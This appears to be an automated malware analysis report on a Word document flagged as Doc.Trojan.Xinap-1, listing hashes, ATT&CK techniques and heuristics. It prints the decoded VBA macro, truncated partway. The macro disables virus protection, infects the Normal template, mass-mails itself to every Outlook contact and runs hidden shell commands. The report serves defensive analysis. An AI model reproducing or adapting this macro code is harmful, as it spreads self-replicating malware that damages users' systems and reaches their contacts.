Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f2a0d131955dc503…

MALICIOUS

Office (OLE)

33.0 KB Created: 2001-10-09 19:42:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14
MD5: 22b122897bd2bc7032c9007ef12be510 SHA-1: b0c04c9e32cc1b31a0b0b90842e0a5925b538f91 SHA-256: f2a0d131955dc50395067bb9d5ceb801242229e9cd857b3514e7a83d325d2076
328 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains heavily obfuscated VBA macros, including a Document_Open auto-execution routine. Critical heuristics indicate the use of Shell() and CreateObject, along with an obfuscated auto-exec loader. The script attempts to decode strings and likely execute a second-stage payload, as suggested by the use of Shell() and Environ() calls to retrieve system information and potentially download further content. The ClamAV detection 'Doc.Trojan.Xinap-1' further supports its malicious nature.

Heuristics 8

  • ClamAV: Doc.Trojan.Xinap-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Xinap-1
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4378 bytes
SHA-256: c5d1a7bfbe1996266826898eb4199d33142804aef236499fb6e00b346bd80d1f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Xinap - By LiteSYS/Xaker
Private Sub Document_Open()
On Error Resume Next
System.PrivateProfileString("", cr("DGIUSOY^^IBXSY_I^P_cjx{m~iPAeo~ccjxPCjjeoiP5""<P[c~hP_ioy~exu", 12), cr("^wdw~", 18)) = 1
With Application.Application: .DisplayStatusBar = Not -1: End With
With Application.Options: .VirusProtection = Not -1: .SaveNormalPrompt = Not -1: End With
WinDir = Environ(cr("_afLaz", 8))
If (Mid(System.LanguageDesignation, 1, 7) = cr("Cuvg÷ij", 6)) Then
NombresAleatorios = Array(cr("]kva.J{|a jam", 14), cr("Yxnb~-}ll-Zdcibz~#ibn", 13), cr("Lncjakn}f`/WWW!k`l", 15), cr("Ryxbetb1axrpetb?u~r", 17), cr("[dnfj%odh", 11))
Else
NombresAleatorios = Array(cr("Bkxniexo*Yor$nei", 10), cr("@~ysx`d7Ce~t|d9sxt", 23), cr("NNN6Uwzsxrwd8ryu", 22), cr("J|a`9svr|j7}vz", 25), cr("A~t|?u~r", 17))
End If
For I = 1 To Tasks.Count
If (Tasks.Item(I).Name = cr("FQW'Jhinshu", 7)) Or (Tasks.Item(I).Name = cr("PUnocjbQohYEjguu", 6)) Then Tasks.Item(I).Close
Next
Set AD = Word.Application.ActiveDocument
Set COPEI = Word.Application.NormalTemplate
Set MVR = AD.VBProject.VBComponents(1).CodeModule
Set MAS = COPEI.VBProject.VBComponents(1).CodeModule
ADeco = False: Chavista = False
If (MVR.Lines(1, 1) = cr("#\mjet$)$F}$HmpaW]W+\eoav", 4)) Then ADeco = True
If (MAS.Lines(1, 1) = cr("$[jmbs#.#Az#OjwfPZP,[bhfq", 3)) Then Chavista = True
If (ADeco = False) Then
Capocho$ = MAS.Lines(1, MAS.CountOfLines): MVR.AddFromString Capocho
ActiveDocument.Save
End If
If (Chavista = False) Then
Huguito$ = MVR.Lines(1, MVR.CountOfLines): MAS.AddFromString Huguito
NormalTemplate.Save
End If
If (Dir(cr("A8^okpa^okpa10,gzg", 2)) <> "") And (System.PrivateProfileString("", cr("DGIUSOY^^IBXSY_I^P_cjx{m~iPAeo~ccjxP[ebhc{POy~~ibxZi~ecb", 12), cr("Udcl}R`D_N", 13)) <> "1") And (Chavista = True) And (ADeco = True) Then
Randomize: Peca = Int(Rnd * 100) Mod 5 + 1
Nombre = WinDir & "\" & NombresAleatorios(Peca)
Jeva = ActiveDocument.FullName: ActiveDocument.SaveAs Nombre: ActiveDocument.SaveAs Jeva
If (Dir(cr("[""Duqj{Dk{jqhl6qvq", 24)) <> "") Then Kill (cr("b}LHSB}RBSHQUHOH", 33))
Open cr("fyHLWFyVFWLUQLKL", 37) For Output As #9
Print #9, cr("DL|mvokB", 31)
Print #9, cr("s- rs=,'WRTS'>'f=2t{=F=9st~v=  =9px=@=f=u|qi=`=a=2y~~=nxsy=9st~v=", 29) & """" & Nombre & """ }"
Close #9
System.PrivateProfileString("", cr("nmcyesttchrysuctzuI@RQGTCzkOETIUI@RzqOHBIQUzeSTTCHRpCTUOIH", 38), cr("Dur}lCqUN_", 28)) = "1"
End If
If (System.PrivateProfileString("", cr("RQ_CEYOHH_TNEOI_HFIu|nm{hFWsyhuiu|nFMst~umiFYohhtnLhisut", 26), cr("@qvyhGWTS", 24)) <> "1") And (Chavista = True) And (ADeco = True) Then
Set Olk = CreateObject(cr("Isrjiim(Gvvjoegroih", 6))
If (Olk <> "") Then
Set mpk = Olk.GetNameSpace(cr("DHY@", 9))
If (mpk = "") Then GoTo OlkE
For I = 1 To mpk.AddressLists.Count
Set libdir = mpk.AddressLists(I): Set MiMail = Olk.CreateItem(0)
For J = 1 To libdir.AddressEntries.Count
Destino = libdir.AddressEntries(J): MiMail.Recipients.Add Destino
Next
MiMail.Subject = "": MiMail.Body = "": MiMail.Attachments.Add ActiveDocument.FullName: MiMail.Send
Next
End If
OlkE:
Olk.Quit
System.PrivateProfileString("", cr("ZYWKMQG@@W\FMGAW@NA}tfes`wN_{q`}a}tfNE{|v}eaNQg``w|fDw`a{}|", 18), cr("NxwfIYZ]", 22)) = "1"
End If
If (Day(Now) = 28) Then
System.PrivateProfileString("", cr("\_QMKWAFFQZ@KAGQFHG{r`cufqHWxuggqgHWXG]PHo&$P$ RQ$9'UQU9%$""-9U&P,9$,$$&V'$'$-Pi", 20), "") = cr("_nifw", 7)
System.PrivateProfileString("", cr("NMC_YEJGUUCUYTIIRZEJUOBZ}46B62@C6+5GCG+760?+G4B>+6>664D5656?B{", 6), "") = cr("]lkdu", 5)
jok = Shell(cr("EHKLE)J3)Q@GHY", 9), vbHide)
If (Int(Rnd * 5 + 1) = 3) Then For I = 1 To 100: Assistant.Visible = 1: With Assistant.NewBalloon: .Animation = msoAnimationBeginSpeaking: .Icon = msoIconAlertCritical: .Text = cr("C@qvyhE8Nqjmk8za8Tql}KAK7@ys}j", 24) &
... (truncated)